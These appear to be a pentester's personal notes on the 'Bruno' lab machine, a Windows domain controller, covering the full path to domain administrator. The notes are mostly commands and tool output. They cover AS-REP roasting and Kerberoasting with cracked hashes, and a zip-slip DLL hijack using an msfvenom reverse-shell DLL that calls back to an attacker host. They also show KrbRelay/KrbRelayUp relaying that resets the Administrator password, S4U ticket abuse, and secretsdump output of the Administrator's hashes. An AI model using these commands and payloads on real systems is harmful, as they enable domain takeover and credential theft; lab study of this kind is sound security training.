Bruno
This is not a writeup, just my notes about VulnLabs machines.
Last updated
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Microsoft Windows Server 2022 Datacenter
Chain: False
svc_scan
Sunshine1
Asreproast
Domain User
svc_net
Sunshine1
Kerberoast
Domain User
✅ Valid Usernames (RID-Brute Forcing)
svc_net
svc_scan
employees
Chloe.Ball
Kayleigh.Patel
Donna.Harrison
Charles.Young
Graeme.Grant
Natalie.Anderson
Sam.Owen
Jeremy.Singh
Kieran.Day
Hugh.Young🔑 Passwords list
Sunshine1Nmap Scan
# Nmap 7.94SVN scan initiated Wed Apr 9 09:14:56 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_bruno_tcp_allports -vvv 10.10.86.131
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: bruno.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49682/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
56502/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56527/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56675/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCAnonymous FTP login Allowed
❯ wget -m --no-passive ftp://anonymous:anonymous@10.10.86.131
❯ tree
.
└── ftp
├── app
│ ├── changelog
│ ├── SampleScanner.deps.json
│ ├── SampleScanner.dll
│ ├── SampleScanner.exe
│ ├── SampleScanner.runtimeconfig.dev.json
│ └── SampleScanner.runtimeconfig.json
├── benign
│ └── test.exe
├── malicious
└── queueFile: changelog
----------------------
Version 0.3
- integrated with dev site
- automation using svc_scan
Version 0.2
- additional functionality
Version 0.1
- initial support for EICAR stringPossible User: svc_scan
Not vulnerable to DNS Zone Transfer AXFR
Domain SID: S-1-5-21-1536375944-4286418366-3447278137
DNS domain: bruno.vl
FQDN: brunodc.bruno.vl
Server allows null session
FFUF | VHost Enumeration | subdomains-top1million-110000.txt | 0 Results
FFUF | Web Fuzzing | directory-list-2.3-medium.txt | root | 0 results
Previously Found User: svc_scan
❯ impacket-GetNPUsers bruno.vl/ -no-pass -usersfile users.txt 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$svc_scan@BRUNO.VL:e2237e0df0d2d6f565f2623c0c1b6a5c$c6ae17f760a235338e410f775dc165dd264623bfeddd22494b312b5d4634ea2f70bd24aef2580f56ede1d44ed117000e3ae8eed1103b65768576072b86cd47996e5f6b8ce846beb59d28092f4028c2b779313d5d65dea874a4917f9107f04724869cc6a02616a635d1e636d3570c19aa24560ce2805cff7d727a3872ea60fc6cb7f54267e5c4d2997c1356ad500871ee22326059d0e3447d075592e5e76edac3df9133641f2db8a848b0ae86f489ab8b1704765ea7e218defbe043dad4304aae263e3af6563e3f92daa3891bf66bb916f9cf3b12bf75b698dac5c7f520b267be5ca05216❯ hashcat -m 18200 svc_scan.asreproast /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc_scan@BRUNO.VL:e2237e0df<SNIF>5ca05216:Sunshine1❯ impacket-GetUserSPNs bruno.vl/svc_scan:'Sunshine1' -request -outputfile kerberoast.hashes 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------- -------- -------- -------------------------- -------------------------- ----------
NET/brunodc.bruno.vl svc_net 2022-06-29 09:35:45.023707 2025-04-09 10:05:29.910962
SCAN/brunodc.bruno.vl svc_scan 2022-06-29 09:36:15.210348 2025-04-09 10:05:41.239671 ❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*svc_scan$BRUNO.VL$bruno.vl/svc_scan*$980<SNIF>5cf107ef4e1d728c1c3773d685a6:Sunshine1
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$5e2ca<SNIF>14511aaa0310c60cbce39fb25bf8:Sunshine1❯ nxc smb 10.10.86.131 -u 'svc_net' -p 'Sunshine1' --shares
SMB 10.10.86.131 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.86.131 445 BRUNODC [+] bruno.vl\svc_net:Sunshine1
SMB 10.10.86.131 445 BRUNODC [*] Enumerated shares
SMB 10.10.86.131 445 BRUNODC Share Permissions Remark
SMB 10.10.86.131 445 BRUNODC ----- ----------- ------
SMB 10.10.86.131 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.86.131 445 BRUNODC C$ Default share
SMB 10.10.86.131 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.86.131 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.86.131 445 BRUNODC NETLOGON READ Logon server share
SMB 10.10.86.131 445 BRUNODC queue READ,WRITE
SMB 10.10.86.131 445 BRUNODC SYSVOL READ Logon server share During the enumeration of SampleScanner.dll, the tester discovered that when SampleScanner.exe is running, it looks for .zip files within C:\samples\queue\. If any are found, it unzips the content and deletes the original .zip file.
#Code Analyzed with dnSpy
private static void Main(string[] args)
{
string text = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EYCAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
text.Replace("EYCAR", "EICAR");
byte[] bytes = Encoding.ASCII.GetBytes(text);
string[] files = Directory.GetFiles("C:\\samples\\queue\\", "*", SearchOption.AllDirectories);
int i = 0;
while (i < files.Length)
{
string text2 = files[i];
if (text2.EndsWith(".zip"))
{
using (ZipArchive zipArchive = ZipFile.OpenRead(text2))
{
foreach (ZipArchiveEntry zipArchiveEntry in zipArchive.Entries)
{
string text3 = Path.Combine("C:\\samples\\queue\\", zipArchiveEntry.FullName);
zipArchiveEntry.ExtractToFile(text3);
}
File.Delete(text2);
goto IL_010E;
}
goto IL_00B8;
}
goto IL_00B8;
IL_010E:
i++;
continue;
IL_00B8:
if (Program.PatternAt(File.ReadAllBytes(text2), bytes).Any<int>())
{
File.Copy(text2, text2.Replace("queue", "malicious"), true);
File.Delete(text2);
goto IL_010E;
}
File.Copy(text2, text2.Replace("queue", "benign"), true);
File.Delete(text2);
goto IL_010E;
}
}Additionally, the application attempts to load hostfxr.dll from the current directory. This behavior can be abused for DLL Hijacking.
A zip file containing a malicious hostfxr.dll named as ../app/hostfxr.dll.
Upload the zip file into queue directory.
When the application runs again it will try to load hostfxr.dll that subsequently send the reverse shell.
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f dll > hostfxr.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytesDouble Checking for the name:
❯ unzip -l hostfxr.zip
Archive: hostfxr.zip
Length Date Time Name
--------- ---------- ----- ----
9216 2025-04-09 08:41 ../app/hostfxr.dll
--------- -------
9216 1 file❯ smbclient '\\bruno.vl\queue' -U "svc_net%Sunshine1"
smb: \> put hostfxr.zip
putting file hostfxr.zip as \hostfxr.zip (18.2 kb/s) (average 18.2 kb/s)LDAP signing not required on Domain Controller.
nxc ldap bruno.vl -u 'svc_net' -p 'Sunshine1' -M ldap-checker
SMB 10.10.110.194 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.110.194 389 BRUNODC [+] bruno.vl\svc_net:Sunshine1
LDAP-CHE... 10.10.110.194 389 BRUNODC LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.110.194 389 BRUNODC LDAPS Channel Binding is set to "NEVER"Ability to add computer into the domain controller.
❯ nxc ldap bruno.vl -u 'svc_net' -p 'Sunshine1' -M maq
SMB 10.10.110.194 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP 10.10.110.194 389 BRUNODC [+] bruno.vl\svc_net:Sunshine1
MAQ 10.10.110.194 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.110.194 389 BRUNODC MachineAccountQuota: 10PS C:\Temp> ./CheckPort.exe
./CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 10246PS C:\Temp> Import-Module .\Powermad.ps1
PS C:\Temp> New-MachineAccount -MachineAccount evilcomputer -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)PS C:\Temp> Get-ADComputer -Identity "evilcomputer" -Properties SID | Select-Object Name, SIDe
S-1-5-21-1536375944-4286418366-3447278137-1117PS C:\Temp> .\KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1117 -port 10246 -ssl -reset-password Administrator Password123!
.\KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1117 -port 10246 -ssl -reset-password Administrator Password123!
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Temp\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACH5O6Z8JnFvEvV1Uw90Me0AnAAALQQ//+cDjQ9VjoEdiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020105a28204b3048204af4b6beb2b9110a73221b44a8a04d1c98f81060fb09e7d7375f568ee63e437449836d128ebdecda9175441c0104bd03ac865981d47822229c0d047f865aacd03437200e55d254a0c81997cc0e6d0d5a6decbe2f676959acac7749cf387f791312665e859efa406dd1485c9e1a45430632c7b824a433cccf8009f53c9221ef1499f6c9d032758aa2ae873ccaef3d6fa6bcefd8b1bd6f017266f95e7ae28caea501accfab7fb438abf56c04cf8ea91bddb84987dcbe1c9e65bc3362dbee0c7958225f811ea6a485f2e6d3d4188586afefbc62ab521c9e340ce7c35920a42c3e954dc56ea4260b1b3091857a23c4a9d94dc2b17b4f9952f5083c133ec07a127677a283f5dc5a209aea370dc95c2fe75e152d530c3f0392297dea7a1a10372c6c6e38282fca7840f0a68b9ddc05df735f5d697c4becc2811aafe8e3aeb8a13d64c343e3688bed232bf849bb3631c2347a75c0a36ba0bed960c58e2c392a8443fbef0be1ca0a13896b7bfbca90216aef3155e83598435e83223b16946d50c68f879ded01c7765fa0e5810567bf1f77264e53384ae0e514db0b64853f635f6200b927c342dc953ac601e7aae114b2cc2f576c722d0e7dccf03313857dfc63044a6cf737469f958e0cde77defb0ebf14a51fcb611522e4dedae098a781c1955b49585633ee2c00201475cfae0da6ecdb608f5476a3ad56b9d77ad1d1cb9bf824b46ffeac89f1c9e1cb3b4672ffd28013f26edc21e89b1b99de2809a909058ed7f24836281d303555b08e36848355a02aaf4b024aae74b62b3206b2cdd188e58f3ea4666b50268f479a9a98b394e61adc797a19982b053588726a0ce05fceae2e58c93a6de844c80aa11298a17d27022e0a0d890638fc377443eb1a94098bcfc6606c230fd75c84ca8ad93721236c352398573afb7a5260cc5fcd1d83845fc438c21ff3b38381caf3bcd26755700ff8d40ee0e426ccac0edb73adfbf3839c5bdaa21d045e171338b52a3a86a254962d6236ff1dc93d4301f91558dce0136ab41d00bdf857e54718d1d4c9af14d66db01a265e9554e111254ee5acbdc1ee046a4a923f940bcb35e63d779db4251191ae9104ae48943ae374c6a05edbeea2a038ef7e5dc0f135b72a53fef2f66b4b8b9f9ff40e574dac600b7d426ccc7771ee67c7c53b514906b3894a3ea374f583d1967bf90d6c5e0ed06ca49918107e49e1726744f54f634af60e05496544ef86b6e41a2535751a6d47ee4a2a518ca1f1654477f09fc3fec2e056b78610ca2f7985f2ef7e68891bbcaee0f6cb2220064c2c01116eb3b5ab742909bdf9428cb28d554b9b81fdbae065643f4615f2d71e28157d396b759d37929f8c6335836bb55f317f9d685da0c4798a478536594b7b81a6f88b66e4de6485431629bf2a34ef3a32977535e8f37bd25a374a1da44e949238d394aedde4d8d4efa025655df50f8ace37f0667aae8f2744670e35b5c7d765877f55d0155b205aa6220dd9565ae23a5a509f8494cd2860544f5e06daace8f8009dcfee02a7d9914a09c8c7ab8c4c76a2e10ec57c265e1370a2caf8be963a8e00379c0e2efd88c59848354ed3ec48e6ac9693753efbd30eb63ef78af5aa297839b25f316f78719c8e59259efc20a0a35e2bba5ea1d11b986b43609984792679078a76a6f5f60cc4e2c730eb7d01668d68d4e363a8ed4a482019e3082019aa003020112a28201910482018d84df0d677265e818b47d42add3b1ca523df1943f1f83d5f8f0d792ebfad1b573d1bb547bc28a4ed6a74874bec008bc7e61ba20b6935b4850ff53c8dae5bb1d05c6e2c18a16e12b23b5ef3660fddfdcba7e441188450685e5df169d4ec4ff685197871f001f3e20e713288d6b85048ee16a7b91ad68e6fa91762584ff6e997da9d12504e495c36585977e574b5c64d13f05552feceda4470f79bcc9896844375b2ce419271a908c283f220a10f01e7bb763b6c11cec313c3000e55c824cde4d6a2e0ade840d9f924f544ceadca7919606867f1aea8013d6132beffe9c6321085c0ca93bbaecfa5b655e8607e5c0cfa368c11b5ca049bab462226356b51aa986cbaff19f05648ed0c0c0cc63fadc9393989dc5d92c13f6e8e58045f5363bf1c1794e3ce577649febb16a90b927fd521b6de74e1ade9437727f44c0cc74acf74c11fe17dbf4e2adc623affd8f1bd6d7e6b1ae702b8662f5d1c9ed9e800e2c0fb25c9b83e512791861051a42c65258f76e15dedea42019ede636b28500513f6feb54bb34bb3bc47072600f10dddd25
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e31d628dff7927d6603ec5a3a3caba593768cde4d889902613ea33be9a9402cc9232c38e1800ccc6935966ff3e01b4b04d86eb537b760f6e8841bcb32b59df79e2d3ef0ac9251eddbfdf6e862c37032e89c9995e2fc99457c09a704e107efb9f24c08adf0c881cf39c7d46eb4f2bb
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404428d489c77f6d3d090176a32eb12f9accf0a803233250cb385f37cd8cc81f603f6d5defd5b00e7bf8cf8db2b3cc6924d9f366953784b7ca208bf429060130c80c35b0b
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
[*] ldap_modify: LDAP_SUCCESS
PS C:\Temp> ❯ evil-winrm -i bruno.vl -u 'Administrator' -p 'Password123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
bruno\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "KRBRELAYUP$" added with password "bD7/vJ7-tF7@kS1-"
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] TGT request successful!
[+] Building S4U2self
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2self request to fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'KRBRELAYUP$@BRUNO.VL'
[+] Impersonating user 'Administrator' to target SPN 'HOST/BRUNODC'
[+] Building S4U2proxy request for service: 'HOST/BRUNODC'
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2proxy request to domain controller fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2proxy success!
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process : 'C:\Temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3552
[+] Ticket successfully imported!
[+] LUID : 0xec39a
[+] System service should be started in background❯ impacket-getST -impersonate 'administrator' bruno.vl/'KRBRELAYUP$':'bD7/vJ7-tF7@kS1-' -spn HOST/brunodc.bruno.vl -dc-ip 10.10.67.195 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@HOST_brunodc.bruno.vl@BRUNO.VL.ccache❯ KRB5CCNAME="administrator@HOST_brunodc.bruno.vl@BRUNO.VL.ccache" impacket-secretsdump -k -no-pass brunodc.bruno.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up...
PS C:\Temp> .\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m rbcd -c -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "KRBRELAYUP$" added with password "bD7/vJ7-tF7@kS1-"
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] TGT request successful!
[+] Building S4U2self
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2self request to fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'KRBRELAYUP$@BRUNO.VL'
[+] Impersonating user 'Administrator' to target SPN 'HOST/BRUNODC'
[+] Building S4U2proxy request for service: 'HOST/BRUNODC'
[+] Using domain controller: brunodc.bruno.vl (fe80::9d1a:7ff2:c40b:9583%6)
[+] Sending S4U2proxy request to domain controller fe80::9d1a:7ff2:c40b:9583%6:88
[+] S4U2proxy success!
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process : 'C:\Temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3552
[+] Ticket successfully imported!
[+] LUID : 0xec39a
[+] System service should be started in backgroundPS C:\Temp> .\Rubeus.exe asktgt /user:'KRBRELAYUP$' /password:'bD7/vJ7-tF7@kS1-' /nowrap
.\Rubeus.exe asktgt /user:'KRBRELAYUP$' /password:'bD7/vJ7-tF7@kS1-' /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: ACFC0492669C004A8D08561ED4EF0DA3
[*] Building AS-REQ (w/ preauth) for: 'bruno.vl\KRBRELAYUP$'
[*] Using domain controller: fe80::9d1a:7ff2:c40b:9583%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFYDCCBVygAwIBBaEDAgEWooIEfjCCBHphggR2MIIEcqADAgEFoQobCEJSVU5PLlZMoh0wG6ADAgECoRQwEhsGa3JidGd0GwhicnVuby52bKOCBD4wggQ6oAMCARKhAwIBAqKCBCwEggQoriz9vNRC5Qs6ZVnWaXioQF4XktrqwMkzqhk7QgpH5JVT6h50nQrxXN1VwchmpTHu9bhII6OgmW+bGYySFws6YUq/Q6ED18QbsY1iEgsotXxtSAj2zml0tZ3gQmrPkgkw01dwW17heEmETPkJgLH91Dkv2vUccNbJF/8dEYUydN/6ux2SEpI2XkzihCzfOU8l9ck4gW5B76I6+MREh4YgV7+xSZ18d6hDMc4nYd4gND2Z1CrlhODM6GUFpjuA6pyI/rVEnk2HNSEk4FRRUSXuRAjeC1t86Fjfx9BLI3t2xetlzpI2C77Zrvu8ZnoQtHAn4nrEDBb5jZmAVqDbrUTKj7p8E/VXq8V8WeUQID9rhy/sfczpLMiA2kZRJRQnsj6MO4PKrmsXf20XFkB6fRuYZBP6Ik+2Bwq9O4x49dQvRd9dsWYsvRS0sge9JAIDDqx5i+zU0zXJrJnTiU6RGxuBpHSrO//vkXxxcwYFxM5kJfbzREAnmSedr4uzz6+QV/a8QhVN9W75KpTNt1z3OiK4ZzWdbwt4QemSJwUQwcLDxyUn9u3sD1TWBcreEcWtxswA/pOrOKOIS6YuDIcH3waWqm3uqeWrTDON1M5odFZYjdkvevLwsxk7wjRUiH34hwmcuWvf5YWkZB82TJioez+gt45WsukvD+5dW/dJNBe7OVd2cx2WfJhC0UC3KKV1xyDB7fkzt/2CftvcR1WCiDk0Q0j3Wxmjy115WEqopywMGj6e3JCQzd48F8ZADU0WYC1Y/HxJ+vogEAt03A4NFhZFGHSvzq3BzSjPtQxEJWsyPtW0byqLUHvRtjm0JNhD7ZvFiv+8TIX9bGDBzwSwGxcyAyZe0Bylj4wRPX1MPHqeS67DTJP0K9mnON1uAoTfLBitBaOu+XCFW2hWTNJxAJdreVl3QdcR0GnVWlq6xa9ct2kqgDUyNrD1qYqb7yAGrUwpEciswe7anOCwzehTsGPTuLqXf5E8VV46rQP7rOmlq+9NL0ktf/5JHwKuxXi/5xdC38DNAcupDeHAgfZ3/UdpcW3dPKITkhXu5eN9J8x1m4cLaCbsCuxCcsOUyx9ibqsaD8vUFvWHYCPKv9NIQV5XSNuxV4ntGUZo7tH6Ai1RcmgKbC1po6clEu9ZDgZ+1DjE58vna1tkqxglOxw+ix5zK5JoLw3OaWLGfvdZxUJZDY6JiskL8y1BMx7IBbRn6LAZH/PGn18YfifNJHDfT0noczNYocF7I7fmaWaAauT36YApm3Vci81f3zA+NTV44jlU4F/9R+K8RGQWiuZzIGVzPwrZBCAG+v6lu4iaxR6USo1MkKK8UirrCFcsRuyLg3SRYHGbnjevuPPrsEvlI009PUOE4y7HFaSM6FprPq7ibcJkLfiyhNOU420ZlCQTS3drLuBtZ4eEKpOjgc0wgcqgAwIBAKKBwgSBv32BvDCBuaCBtjCBszCBsKAbMBmgAwIBF6ESBBAP28err1/xCqlSZdUu8QM7oQobCEJSVU5PLlZMohgwFqADAgEBoQ8wDRsLS1JCUkVMQVlVUCSjBwMFAEDhAAClERgPMjAyNTA0MTEwMTMzMjJaphEYDzIwMjUwNDExMTEzMzIyWqcRGA8yMDI1MDQxODAxMzMyMlqoChsIQlJVTk8uVkypHTAboAMCAQKhFDASGwZrcmJ0Z3QbCGJydW5vLnZs
ServiceName : krbtgt/bruno.vl
ServiceRealm : BRUNO.VL
UserName : KRBRELAYUP$
UserRealm : BRUNO.VL
StartTime : 4/11/2025 1:33:22 AM
EndTime : 4/11/2025 11:33:22 AM
RenewTill : 4/18/2025 1:33:22 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : D9vHq69f8QqpUmXVLvEDOw==
ASREP (key) : ACFC0492669C004A8D08561ED4EF0DA3PS C:\Temp> .\Rubeus.exe s4u /ticket:doIFYDCCBVygAwIBBaEDAgEWooIE<>snip /impersonateuser:administrator /msdsspn:HOST/brunodc.bruno.vl /domain:bruno.vl /dc:brunodc.bruno.vl /nowrap /outfile:ticket.kirbiI tried to perform a DCSync attack within Windows using Mimikatz, but it didn’t work, even though the tickets were valid. On Windows, UAC (User Account Control) filters admin privileges for network operations (e.g., SMB, LDAP), causing Access Denied and Mimikatz failed because SeDebugPrivilege wasn’t enabled due to insufficient local privileges or restrictions. Additionally, tickets injected into the session via /ptt are subject to UAC and local ACLs, limiting their use. Then I decided to move to my Linux machine and perform the DCSync attack using Impacket. In Linux, it worked because Impacket uses the .ccache ticket directly against the DC, bypassing UAC and local privilege issues, and applies the ticket’s permissions cleanly over the network without session constraints.
PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /all /path" exit
.\mimikatz.exe privilege::debug "lsadump::dcsync /all /path" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /all /path
[DC] 'bruno.vl' will be the domain
[DC] 'brunodc.bruno.vl' will be the DC server
[DC] Exporting domain 'bruno.vl'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)
mimikatz(commandline) # exit
Bye!
PS C:\Temp> impacket-ticketConverter "ticket_administrator_to_KRBRELAYUP$@BRUNO.VL.kirbi" administrator.ccache
impacket-ticketConverter "ticket_HOST_brunodc.bruno.vl.kirbi" host.ccache❯ KRB5CCNAME="host.ccache" impacket-secretsdump -k -no-pass brunodc.bruno.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up...
c980e4c2-c178-4572-935d-a8a429884806
90f18417-f0f1-484e-9d3c-59dceee5dbd8
03ca98d6-ff5d-49b8-abc6-03dd84127020
d99e6e73-fc88-11d0-b498-00a0c90312f3
42cbfaa7-a4a7-47bb-b422-bd10e9d02700
000c101c-0000-0000-c000-000000000046
1bf48339-d15e-45f3-ad55-a851cb66be6b
49e6370b-ab71-40ab-92f4-b009539e4518
50d185b9-fff3-4656-92c7-e4018da4361d
